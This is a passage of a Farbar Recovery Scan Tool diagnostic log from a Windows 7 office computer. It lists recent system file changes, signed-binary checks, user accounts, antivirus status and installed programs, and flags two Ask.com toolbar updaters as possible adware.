10:32 - 00016384 _____ (Microsoft Corporation) C:\Windows\system32\ntvdm64.dll 2016-11-09 14:24 - 2016-10-07 10:32 - 00013312 _____ (Microsoft Corporation) C:\Windows\system32\wow64cpu.dll 2016-11-09 14:24 - 2016-10-07 10:32 - 00006656 _____ (Microsoft Corporation) C:\Windows\system32\apisetschema.dll 2016-11-09 14:24 - 2016-10-07 10:32 - 00006144 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-security-base-l1-1-0.dll 2016-11-09 14:24 - 2016-10-07 10:32 - 00005120 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-file-l1-1-0.dll 2016-11-09 14:24 - 2016-10-07 10:32 - 00004608 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-threadpool-l1-1-0.dll 2016-11-09 14:24 - 2016-10-07 10:32 - 00004608 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-processthreads-l1-1-0.dll 2016-11-09 14:24 - 2016-10-07 10:32 - 00004096 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-sysinfo-l1-1-0.dll 2016-11-09 14:24 - 2016-10-07 10:32 - 00004096 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-synch-l1-1-0.dll 2016-11-09 14:24 - 2016-10-07 10:32 - 00004096 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-localregistry-l1-1-0.dll 2016-11-09 14:24 - 2016-10-07 10:32 - 00004096 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-localization-l1-1-0.dll 2016-11-09 14:24 - 2016-10-07 10:32 - 00003584 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-rtlsupport-l1-1-0.dll 2016-11-09 14:24 - 2016-10-07 10:32 - 00003584 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-processenvironment-l1-1-0.dll 2016-11-09 14:24 - 2016-10-07 10:32 - 00003584 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-namedpipe-l1-1-0.dll 2016-11-09 14:24 - 2016-10-07 10:32 - 00003584 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-misc-l1-1-0.dll 2016-11-09 14:24 - 2016-10-07 10:32 - 00003584 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-memory-l1-1-0.dll 2016-11-09 14:24 - 2016-10-07 10:32 - 00003584 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-libraryloader-l1-1-0.dll 2016-11-09 14:24 - 2016-10-07 10:32 - 00003584 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-heap-l1-1-0.dll 2016-11-09 14:24 - 2016-10-07 10:32 - 00003072 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-xstate-l1-1-0.dll 2016-11-09 14:24 - 2016-10-07 10:32 - 00003072 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-util-l1-1-0.dll 2016-11-09 14:24 - 2016-10-07 10:32 - 00003072 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-string-l1-1-0.dll 2016-11-09 14:24 - 2016-10-07 10:32 - 00003072 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-profile-l1-1-0.dll 2016-11-09 14:24 - 2016-10-07 10:32 - 00003072 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-io-l1-1-0.dll 2016-11-09 14:24 - 2016-10-07 10:32 - 00003072 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-interlocked-l1-1-0.dll 2016-11-09 14:24 - 2016-10-07 10:32 - 00003072 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-handle-l1-1-0.dll 2016-11-09 14:24 - 2016-10-07 10:32 - 00003072 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-fibers-l1-1-0.dll 2016-11-09 14:24 - 2016-10-07 10:32 - 00003072 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-errorhandling-l1-1-0.dll 2016-11-09 14:24 - 2016-10-07 10:32 - 00003072 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-delayload-l1-1-0.dll 2016-11-09 14:24 - 2016-10-07 10:32 - 00003072 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-debug-l1-1-0.dll 2016-11-09 14:24 - 2016-10-07 10:32 - 00003072 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-datetime-l1-1-0.dll 2016-11-09 14:24 - 2016-10-07 10:32 - 00003072 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-console-l1-1-0.dll 2016-11-09 14:24 - 2016-10-07 10:18 - 04000488 _____ (Microsoft Corporation) C:\Windows\SysWOW64\ntkrnlpa.exe 2016-11-09 14:24 - 2016-10-07 10:18 - 03944680 _____ (Microsoft Corporation) C:\Windows\SysWOW64\ntoskrnl.exe 2016-11-09 14:24 - 2016-10-07 10:15 - 01314112 _____ (Microsoft Corporation) C:\Windows\SysWOW64\ntdll.dll 2016-11-09 14:24 - 2016-10-07 10:12 - 02291712 _____ (Microsoft Corporation) C:\Windows\SysWOW64\MSVidCtl.dll 2016-11-09 14:24 - 2016-10-07 10:12 - 01114112 _____ (Microsoft Corporation) C:\Windows\SysWOW64\kernel32.dll 2016-11-09 14:24 - 2016-10-07 10:12 - 00644096 _____ (Microsoft Corporation) C:\Windows\SysWOW64\advapi32.dll 2016-11-09 14:24 - 2016-10-07 10:12 - 00581632 _____ (Microsoft Corporation) C:\Windows\SysWOW64\oleaut32.dll 2016-11-09 14:24 - 2016-10-07 10:12 - 00275456 _____ (Microsoft Corporation) C:\Windows\SysWOW64\KernelBase.dll 2016-11-09 14:24 - 2016-10-07 10:12 - 00067584 _____ (Microsoft Corporation) C:\Windows\SysWOW64\asycfilt.dll 2016-11-09 14:24 - 2016-10-07 10:12 - 00050688 _____ (Microsoft Corporation) C:\Windows\SysWOW64\appidapi.dll 2016-11-09 14:24 - 2016-10-07 10:12 - 00043008 _____ (Microsoft Corporation) C:\Windows\SysWOW64\srclient.dll 2016-11-09 14:24 - 2016-10-07 10:12 - 00006656 _____ (Microsoft Corporation) C:\Windows\SysWOW64\apisetschema.dll 2016-11-09 14:24 - 2016-10-07 10:12 - 00005120 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-file-l1-1-0.dll 2016-11-09 14:24 - 2016-10-07 10:12 - 00005120 _____ (Microsoft Corporation) C:\Windows\SysWOW64\wow32.dll 2016-11-09 14:24 - 2016-10-07 10:12 - 00004608 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-processthreads-l1-1-0.dll 2016-11-09 14:24 - 2016-10-07 10:12 - 00004096 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-sysinfo-l1-1-0.dll 2016-11-09 14:24 - 2016-10-07 10:12 - 00004096 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-synch-l1-1-0.dll 2016-11-09 14:24 - 2016-10-07 10:12 - 00004096 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-misc-l1-1-0.dll 2016-11-09 14:24 - 2016-10-07 10:12 - 00004096 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-localregistry-l1-1-0.dll 2016-11-09 14:24 - 2016-10-07 10:12 - 00004096 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-localization-l1-1-0.dll 2016-11-09 14:24 - 2016-10-07 10:12 - 00003584 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-processenvironment-l1-1-0.dll 2016-11-09 14:24 - 2016-10-07 10:12 - 00003584 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-namedpipe-l1-1-0.dll 2016-11-09 14:24 - 2016-10-07 10:12 - 00003584 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-memory-l1-1-0.dll 2016-11-09 14:24 - 2016-10-07 10:12 - 00003584 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-libraryloader-l1-1-0.dll 2016-11-09 14:24 - 2016-10-07 10:12 - 00003584 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-interlocked-l1-1-0.dll 2016-11-09 14:24 - 2016-10-07 10:12 - 00003584 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-heap-l1-1-0.dll 2016-11-09 14:24 - 2016-10-07 10:12 - 00003072 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-string-l1-1-0.dll 2016-11-09 14:24 - 2016-10-07 10:12 - 00003072 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-rtlsupport-l1-1-0.dll 2016-11-09 14:24 - 2016-10-07 10:12 - 00003072 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-profile-l1-1-0.dll 2016-11-09 14:24 - 2016-10-07 10:12 - 00003072 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-io-l1-1-0.dll 2016-11-09 14:24 - 2016-10-07 10:12 - 00003072 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-handle-l1-1-0.dll 2016-11-09 14:24 - 2016-10-07 10:12 - 00003072 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-fibers-l1-1-0.dll 2016-11-09 14:24 - 2016-10-07 10:12 - 00003072 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-errorhandling-l1-1-0.dll 2016-11-09 14:24 - 2016-10-07 10:12 - 00003072 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-delayload-l1-1-0.dll 2016-11-09 14:24 - 2016-10-07 10:12 - 00003072 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-debug-l1-1-0.dll 2016-11-09 14:24 - 2016-10-07 10:12 - 00003072 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-datetime-l1-1-0.dll 2016-11-09 14:24 - 2016-10-07 10:12 - 00003072 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-console-l1-1-0.dll 2016-11-09 14:24 - 2016-10-07 10:04 - 00148480 _____ (Microsoft Corporation) C:\Windows\system32\appidpolicyconverter.exe 2016-11-09 14:24 - 2016-10-07 10:04 - 00062464 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\appid.sys 2016-11-09 14:24 - 2016-10-07 10:04 - 00017920 _____ (Microsoft Corporation) C:\Windows\system32\appidcertstorecheck.exe 2016-11-09 14:24 - 2016-10-07 10:01 - 00338432 _____ (Microsoft Corporation) C:\Windows\system32\conhost.exe 2016-11-09 14:24 - 2016-10-07 10:00 - 00296960 _____ (Microsoft Corporation) C:\Windows\system32\rstrui.exe 2016-11-09 14:24 - 2016-10-07 09:56 - 00112640 _____ (Microsoft Corporation) C:\Windows\system32\smss.exe 2016-11-09 14:24 - 2016-10-07 09:50 - 00025600 _____ (Microsoft Corporation) C:\Windows\SysWOW64\setup16.exe 2016-11-09 14:24 - 2016-10-07 09:50 - 00014336 _____ (Microsoft Corporation) C:\Windows\SysWOW64\ntvdm64.dll 2016-11-09 14:24 - 2016-10-07 09:50 - 00007680 _____ (Microsoft Corporation) C:\Windows\SysWOW64\instnm.exe 2016-11-09 14:24 - 2016-10-07 09:50 - 00002048 _____ (Microsoft Corporation) C:\Windows\SysWOW64\user.exe 2016-11-09 14:24 - 2016-10-07 09:49 - 00006144 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-security-base-l1-1-0.dll 2016-11-09 14:24 - 2016-10-07 09:49 - 00004608 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-threadpool-l1-1-0.dll 2016-11-09 14:24 - 2016-10-07 09:49 - 00003584 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-xstate-l1-1-0.dll 2016-11-09 14:24 - 2016-10-07 09:49 - 00003072 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-util-l1-1-0.dll 2016-11-09 14:24 - 2016-10-05 09:54 - 00090112 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\bowser.sys 2016-11-09 14:24 - 2016-09-15 09:56 - 00041984 _____ (Microsoft Corporation) C:\Windows\system32\UtcResources.dll 2016-11-09 14:24 - 2016-09-13 10:37 - 00002048 _____ (Microsoft Corporation) C:\Windows\system32\tzres.dll 2016-11-09 14:24 - 2016-09-13 10:11 - 00002048 _____ (Microsoft Corporation) C:\Windows\SysWOW64\tzres.dll 2016-11-09 14:24 - 2016-09-09 13:20 - 00756736 _____ (Microsoft Corporation) C:\Windows\system32\win32spl.dll 2016-11-09 14:24 - 2016-09-09 13:00 - 00497152 _____ (Microsoft Corporation) C:\Windows\SysWOW64\win32spl.dll 2016-11-09 14:23 - 2016-08-22 11:19 - 01386496 _____ (Microsoft Corporation) C:\Windows\system32\diagtrack.dll 2016-11-09 11:08 - 2016-12-06 05:53 - 00002271 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Google Chrome.lnk 2016-11-09 11:07 - 2016-12-07 05:12 - 00000904 _____ C:\Windows\Tasks\GoogleUpdateTaskMachineUA.job 2016-11-09 11:07 - 2016-12-06 16:36 - 00000900 _____ C:\Windows\Tasks\GoogleUpdateTaskMachineCore.job 2016-11-09 11:07 - 2016-11-09 11:07 - 01065376 _____ (Google Inc.) C:\Users\Reception\Downloads\ChromeSetup.exe 2016-11-09 11:07 - 2016-11-09 11:07 - 00003900 _____ C:\Windows\System32\Tasks\GoogleUpdateTaskMachineUA 2016-11-09 11:07 - 2016-11-09 11:07 - 00003648 _____ C:\Windows\System32\Tasks\GoogleUpdateTaskMachineCore 2016-11-09 11:07 - 2016-11-09 11:07 - 00000000 ____D C:\Program Files (x86)\Google 2016-11-08 16:09 - 2016-12-06 16:34 - 00000988 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\LogMeIn Control Panel.lnk 2016-11-08 16:08 - 2016-11-08 16:08 - 00000000 ____D C:\Users\Reception\AppData\Local\LogMeIn 2016-11-08 16:08 - 2016-10-12 13:31 - 00122400 _____ (LogMeIn, Inc.) C:\Windows\system32\LMIRfsClientNP.dll 2016-11-08 16:08 - 2016-10-12 13:31 - 00107520 _____ (LogMeIn, Inc.) C:\Windows\system32\LMIinit.dll 2016-11-08 16:08 - 2016-01-29 11:53 - 00035328 _____ (LogMeIn, Inc.) C:\Windows\system32\LMIport.dll 2016-11-08 16:08 - 2013-12-10 15:15 - 00107368 _____ (LogMeIn, Inc.) C:\Windows\system32\LMIRfsClientNP.dll.000.bak 2016-11-08 16:08 - 2013-11-05 16:45 - 00072216 _____ (LogMeIn, Inc.) C:\Windows\system32\Drivers\LMIRfsDriver.sys 2016-11-08 16:07 - 2016-11-08 16:09 - 00000000 ____D C:\Program Files (x86)\LogMeIn 2016-11-08 15:48 - 2016-11-08 15:48 - 20489480 _____ C:\Users\Reception\Downloads\LogMeIn.exe ==================== One Month Modified files and folders ======== (If an entry is included in the fixlist, the file/folder will be moved.) 2016-12-07 06:02 - 2013-02-27 07:50 - 00000830 _____ C:\Windows\Tasks\Adobe Flash Player Updater.job 2016-12-07 05:31 - 2014-02-26 12:30 - 00000346 _____ C:\Windows\Tasks\HP Photo Creations Communicator.job 2016-12-07 05:25 - 2011-05-13 16:24 - 00000000 ____D C:\ProgramData\LogMeIn 2016-12-07 05:13 - 2011-05-13 11:48 - 00000112 _____ C:\Windows\system32\config\netlogon.ftl 2016-12-07 04:16 - 2009-07-13 23:45 - 00031904 ____H C:\Windows\system32\7B296FB0-376B-497e-B012-9C450E1B7327-5P-1.C7483456-A289-439d-8115-601632D005A0 2016-12-07 04:16 - 2009-07-13 23:45 - 00031904 ____H C:\Windows\system32\7B296FB0-376B-497e-B012-9C450E1B7327-5P-0.C7483456-A289-439d-8115-601632D005A0 2016-12-06 16:34 - 2009-07-14 00:08 - 00000006 ____H C:\Windows\Tasks\SA.DAT 2016-12-06 07:47 - 2014-10-23 11:44 - 00192216 _____ (Malwarebytes) C:\Windows\system32\Drivers\MBAMSwissArmy.sys 2016-12-06 05:28 - 2011-05-13 11:53 - 00000000 ____D C:\Users\Reception 2016-12-06 05:21 - 2009-07-13 22:20 - 00000000 ____D C:\Windows\inf 2016-12-06 05:19 - 2011-05-11 13:31 - 00000000 ____D C:\Intel 2016-12-06 02:40 - 2009-07-13 22:20 - 00000000 ____D C:\Windows\L2Schemas 2016-12-06 02:38 - 2016-08-11 09:57 - 00000000 ____D C:\Program Files (x86)\Slimjet 2016-12-06 02:26 - 2014-10-23 11:44 - 00000000 ____D C:\Program Files (x86)\Malwarebytes Anti-Malware 2016-12-05 12:13 - 2011-05-13 12:20 - 00000000 ____D C:\Users\clayton 2016-12-05 12:11 - 2016-10-12 09:59 - 00000000 ____D C:\Qoobox 2016-12-05 12:11 - 2016-10-12 09:58 - 00000000 ____D C:\Windows\erdnt 2016-12-05 12:11 - 2013-11-15 10:31 - 00000000 ____D C:\Users\blagler 2016-12-05 12:11 - 2013-08-14 15:57 - 00000000 ____D C:\Program Files (x86)\Print Tracker 2016-12-05 12:11 - 2012-02-24 09:18 - 00000000 ____D C:\Users\dcreery 2016-12-05 12:11 - 2011-05-13 11:45 - 00000000 ____D C:\Users\thepclink 2016-12-05 12:11 - 2010-11-21 02:16 - 00000000 ___RD C:\Users\Public\Recorded TV 2016-12-05 12:11 - 2009-07-13 22:20 - 00000000 ____D C:\Windows\security 2016-12-05 12:11 - 2009-07-13 22:20 - 00000000 ____D C:\Windows\registration 2016-12-05 12:09 - 2011-05-13 12:23 - 00000000 __RHD C:\MSOCache 2016-12-02 12:08 - 2015-02-11 16:28 - 00000000 ____D C:\Users\Reception\AppData\Local\CrashDumps 2016-11-14 18:12 - 2009-07-14 00:13 - 00782778 _____ C:\Windows\system32\PerfStringBackup.INI 2016-11-14 07:53 - 2015-11-11 10:58 - 00000000 ____D C:\Program Files (x86)\Backblaze 2016-11-10 15:36 - 2009-07-13 22:20 - 00000000 ____D C:\Windows\system32\NDF 2016-11-10 13:19 - 2009-07-13 22:20 - 00000000 ____D C:\Windows\rescache 2016-11-10 06:56 - 2009-07-13 23:45 - 01637720 _____ C:\Windows\system32\FNTCACHE.DAT 2016-11-09 17:09 - 2013-08-14 02:01 - 00000000 ____D C:\Windows\system32\MRT 2016-11-09 16:57 - 2011-05-11 10:40 - 141011376 ____C (Microsoft Corporation) C:\Windows\system32\MRT.exe 2016-11-09 14:39 - 2011-05-16 08:24 - 00000000 ____D C:\Users\Reception\AppData\Local\Google 2016-11-08 20:22 - 2012-01-04 10:02 - 00000000 ____D C:\Windows\Hewlett-Packard 2016-11-08 16:14 - 2014-10-23 11:44 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Malwarebytes Anti-Malware 2016-11-08 16:09 - 2011-05-13 16:24 - 00001024 _____ C:\.rnd 2016-11-08 10:02 - 2013-02-27 07:50 - 00796352 _____ (Adobe Systems Incorporated) C:\Windows\SysWOW64\FlashPlayerApp.exe 2016-11-08 10:02 - 2013-02-27 07:50 - 00003768 _____ C:\Windows\System32\Tasks\Adobe Flash Player Updater 2016-11-08 10:02 - 2013-02-27 07:50 - 00000000 ____D C:\Windows\system32\Macromed 2016-11-08 10:02 - 2011-07-25 07:38 - 00142528 _____ (Adobe Systems Incorporated) C:\Windows\SysWOW64\FlashPlayerCPLApp.cpl 2016-11-08 10:02 - 2011-05-13 16:09 - 00000000 ____D C:\Windows\SysWOW64\Macromed ==================== Files in the root of some directories ======= 2014-10-23 15:43 - 2014-10-23 15:43 - 0000272 _____ () C:\Users\Reception\AppData\Roaming\.backup.dm 2011-05-13 16:12 - 2011-05-13 16:12 - 0000697 _____ () C:\Users\Reception\AppData\Roaming\ConvAPIPlugin.log 2015-08-07 13:53 - 2015-08-07 13:53 - 0022544 _____ () C:\Users\Reception\AppData\Roaming\UserTile.png 2014-10-24 13:59 - 2014-10-24 13:59 - 0007643 _____ () C:\Users\Reception\AppData\Local\Resmon.ResmonCfg 2016-11-10 14:24 - 2016-07-14 04:09 - 0010240 _____ () C:\Users\Reception\AppData\Local\Z@!-66cdbda3-850e-49fb-bcc4-315e343cf0e0.tmp 2016-11-10 14:24 - 2016-07-14 04:09 - 0009216 _____ () C:\Users\Reception\AppData\Local\Z@S!-41305b6f-9545-4896-8e05-c1bc01799922.tmp 2013-11-11 09:40 - 2013-11-11 09:40 - 0000057 _____ () C:\ProgramData\Ament.ini 2011-05-13 15:07 - 2011-05-13 16:12 - 0003443 _____ () C:\ProgramData\hpzinstall.log ==================== Bamital & volsnap ====================== (There is no automatic fix for files that do not pass verification.) C:\Windows\system32\winlogon.exe => File is digitally signed C:\Windows\system32\wininit.exe => File is digitally signed C:\Windows\SysWOW64\wininit.exe => File is digitally signed C:\Windows\explorer.exe => File is digitally signed C:\Windows\SysWOW64\explorer.exe => File is digitally signed C:\Windows\system32\svchost.exe => File is digitally signed C:\Windows\SysWOW64\svchost.exe => File is digitally signed C:\Windows\system32\services.exe => File is digitally signed C:\Windows\system32\User32.dll => File is digitally signed C:\Windows\SysWOW64\User32.dll => File is digitally signed C:\Windows\system32\userinit.exe => File is digitally signed C:\Windows\SysWOW64\userinit.exe => File is digitally signed C:\Windows\system32\rpcss.dll => File is digitally signed C:\Windows\system32\dnsapi.dll => File is digitally signed C:\Windows\SysWOW64\dnsapi.dll => File is digitally signed C:\Windows\system32\Drivers\volsnap.sys => File is digitally signed LastRegBack: 2016-12-02 04:41 ==================== End of FRST.txt ============================ Additional scan result of Farbar Recovery Scan Tool (x64) Version: 07-12-2016 Ran by Reception (07-12-2016 06:04:23) Running from \\SPARTA\RedirectedFolders\Reception\Desktop Windows 7 Professional Service Pack 1 (X64) (2011-05-13 16:44:56) Boot Mode: Normal ========================================================== ==================== Accounts: ============================= admin (S-1-5-21-1158510682-2263174364-945799988-1001 - Administrator - Enabled) Administrator (S-1-5-21-1158510682-2263174364-945799988-500 - Administrator - Disabled) Guest (S-1-5-21-1158510682-2263174364-945799988-501 - Limited - Disabled) ==================== Security Center ======================== (If an entry is included in the fixlist, it will be removed.) AV: Symantec Endpoint Protection (Enabled - Up to date) {53C7D717-52E2-B95E-FA61-6F32ECC805DB} AS: Windows Defender (Disabled - Up to date) {D68DDC3A-831F-4fae-9E44-DA132C1ACF46} AS: Symantec Endpoint Protection (Enabled - Up to date) {E8A636F3-74D8-B6D0-C0D1-5440974F4F66} ==================== Installed Programs ====================== (Only the adware programs with "Hidden" flag could be added to the fixlist to unhide them. The adware programs should be uninstalled manually.) 64 Bit HP CIO Components Installer (Version: 7.2.8 - Hewlett-Packard) Hidden 6500_E709_eDocs (x32 Version: 1.00.0000 - Hewlett-Packard) Hidden 6500_E709_Help (x32 Version: 1.00.0000 - Hewlett-Packard) Hidden 6500_E709a (x32 Version: 140.0.000.000 - Hewlett-Packard) Hidden 7-Zip 16.02 (HKLM-x32\...\7-Zip) (Version: 16.02 - Igor Pavlov) Adobe Acrobat X Pro (HKLM-x32\...\{AC76BA86-1033-0000-7760-000000000005}) (Version: 10.1.6 - Adobe Systems) Adobe AIR (HKLM-x32\...\Adobe AIR) (Version: 2.6.0.19140 - Adobe Systems Incorporated) Adobe Flash Player 23 ActiveX (HKLM-x32\...\Adobe Flash Player ActiveX) (Version: 23.0.0.207 - Adobe Systems Incorporated) Adobe Flash Player 23 NPAPI (HKLM-x32\...\Adobe Flash Player NPAPI) (Version: 23.0.0.207 - Adobe Systems Incorporated) Adobe Reader X (10.1.9) (HKLM-x32\...\{AC76BA86-7AD7-1033-7B44-AA1000000001}) (Version: 10.1.9 - Adobe Systems Incorporated) Apple Application Support (32-bit) (HKLM-x32\...\{D4B07658-F443-4445-A261-E643996E139D}) (Version: 4.3.2 - Apple Inc.) Apple Application Support (64-bit) (HKLM\...\{A6B0442B-E159-444B-B49D-6B9AC531EAE3}) (Version: 4.3.2 - Apple Inc.) Apple Mobile Device Support (HKLM\...\{2E4AF2A6-50EA-4260-9BA4-5E582D11879A}) (Version: 9.3.0.15 - Apple Inc.) Apple Software Update (HKLM-x32\...\{56EC47AA-5813-4FF6-8E75-544026FBEA83}) (Version: 2.2.0.150 - Apple Inc.) Ask Toolbar Updater (HKU\s-1-5-21-3320201264-2921037059-4171379232-1164\...\{79A765E1-C399-405B-85AF-466F52E918B0}) (Version: 1.2.0.20007 - Ask.com) <==== ATTENTION Avery Toolbar Updater (HKU\s-1-5-21-3320201264-2921037059-4171379232-1166\...\{79A765E1-C399-405B-85AF-466F52E918B0}) (Version: 1.2.6.44892 - Ask.com) <==== ATTENTION Backblaze (HKLM-x32\...\Backblaze) (Version: - Backblaze, Inc) Bonjour (HKLM\...\{56DDDFB8-7F79-4480-89D5-25E1F52AB28F}) (Version: 3.1.0.1 - Apple Inc.) bpd_scan (x32 Version: 3.00.0000 - Hewlett-Packard) Hidden BPDSoftware (x32 Version: 140.0.000.000 - Hewlett-Packard) Hidden BPDSoftware_Ini (x32 Version: 1.00.0000 - Hewlett-Packard) Hidden BufferChm (x32 Version: 140.0.213.000 - Hewlett-Packard) Hidden CASIO C781 USB Driver V1.0.4.0 (HKLM-x32\...\{3FA1785D-EED5-4840-A78F-2FC8B663CA86}) (Version: 1.0.4.0 - CASIO) Citrix Online Launcher (HKLM-x32\...\{678753E6-E526-4AE5-A144-00240772543A}) (Version: 1.0.393 - Citrix) CrystalDiskInfo 7.0.4 (HKLM-x32\...\CrystalDiskInfo_is1) (Version: 7.0.4 - Crystal Dew World) CYMA IV Accounting Workstation (HKLM-x32\...\{6F43D45B-4C72-4BB8-9601-BFE282765A38}) (Version: 14.3.0 - CYMA Systems Inc.) CYMA IV Accounting Workstation (x32 Version: 13.0.0 - CYMA Systems Inc.) Hidden CYMA IV Accounting Workstation (x32 Version: 14.0.0 - CYMA Systems Inc.) Hidden DESI Labeling System (HKLM-x32\...\DESI Labeling System 3.8.1.0) (Version: 3.1.10.1 - DESI Telephone Labels, Inc.) DESI Labeling System (Version: 3.8.1.0 - DESI Telephone Labels, Inc.) Hidden Destinations (x32 Version: 130.0.0.0 - Hewlett-Packard) Hidden DeviceDiscovery (x32 Version: 140.0.213.000 - Hewlett-Packard) Hidden DocMgr (x32 Version: 140.0.65.000 - Hewlett-Packard) Hidden DocProc (x32 Version: 140.0.100.000 - Hewlett-Packard) Hidden Fax (x32 Version: 140.0.213.000 - Hewlett-Packard) Hidden FileZilla Server (HKLM-x32\...\FileZilla Server) (Version: beta 0.9.49 - FileZilla Project) FlashPeak Slimjet (HKLM-x32\...\Slimjet) (Version: 10.0.8.0 - FlashPeak Inc.) Google Chrome (HKLM-x32\...\Google Chrome) (Version: 55.0.2883.75 - Google Inc.) Google Update Helper (x32 Version: 1.3.31.5 - Google Inc.) Hidden GoToAssist Corporate (HKLM-x32\...\GoToAssist) (Version: 11.0.0.1019 - Citrix Online, a division of Citrix Systems, Inc.) GoToAssist Customer 2.5.0.888 (HKLM-x32\...\GoToAssist Express Customer) (Version: 2.5.0.888 - Citrix Online) GPBaseService2 (x32 Version: 140.0.212.000 - Hewlett-Packard) Hidden Hewlett-Packard ACLM.NET v1.1.0.0 (x32 Version: 1.00.0000 - Hewlett-Packard) Hidden HP Customer Participation Program 14.0 (HKLM\...\HPExtendedCapabilities) (Version: 14.0 - HP) HP Deskjet 2540 series Basic Device Software (HKLM\...\{BD1EFE20-246B-451F-B900-F1214324DF5F}) (Version: 30.0.1093.41190 - Hewlett-Packard Co.) HP Deskjet 2540 series Help (HKLM-x32\...\{4539575D-C09D-4E71-B207-0F2D6BD74DA2}) (Version: 30.0.0 - Hewlett Packard) HP Document Manager 2.0 (HKLM\...\HP Document Manager) (Version: 2.0 - HP) HP Imaging Device Functions 14.0 (HKLM\...\HP Imaging Device Functions) (Version: 14.0 - HP) HP Officejet 6500 E709 Series (HKLM\...\{58D79E62-CFC8-4331-8469-3A1B16E1769C}) (Version: 14.0 - HP) HP Officejet Pro 8610 Basic Device Software (HKLM\...\{39DA3F40-0B9E-4002-8E01-108FEC9EFE43}) (Version: 32.3.198.49673 - Hewlett-Packard Co.) HP Officejet Pro 8610 Help (HKLM-x32\...\{F9569D00-4576-46C8-B6C7-207A4FD39745}) (Version: 32.0.0 - Hewlett Packard) HP Photo Creations (HKLM-x32\...\HP Photo Creations) (Version: 1.0.0.12992 - HP) HP Product Detection (HKLM-x32\...\{A436F67F-687E-4736-BD2B-537121A804CF}) (Version: 11.14.0001 - HP) HP Smart Web Printing 4.60 (HKLM\...\HP Smart Web Printing) (Version: 4.60 - HP) HP Solution Center 14.0 (HKLM\...\HP Solution Center & Imaging Support Tools) (Version: 14.0 - HP) HP Update (HKLM-x32\...\{912D30CF-F39E-4B31-AD9A-123C6B794EE2}) (Version: 5.005.002.002 - Hewlett-Packard) HPDiagnosticAlert (x32 Version: 1.00.0000 - Microsoft) Hidden HPProductAssistant (x32 Version: 140.0.213.000 - Hewlett-Packard) Hidden HPSSupply (x32 Version: 140.0.212.000 - Hewlett-Packard) Hidden I.R.I.S. OCR (HKLM-x32\...\{CA6BCA2F-EDEB-408F-850B-31404BE16A61}) (Version: 12.3.4.0 - HP) iCloud (HKLM\...\{724A887F-2B55-4306-B6F9-8F0E7A04B1B5}) (Version: 5.2.2.87 - Apple Inc.) Intel(R) Graphics Media Accelerator Driver (HKLM-x32\...\{F0E3AD40-2BBD-4360-9C76-B9AC9A5886EA}) (Version: 8.15.10.2869 - Intel Corporation) iTunes (HKLM\...\{955524E7-79EB-4CA9-BA4D-FD2DF587651B}) (Version: 12.4.3.1 - Apple Inc.) join.me 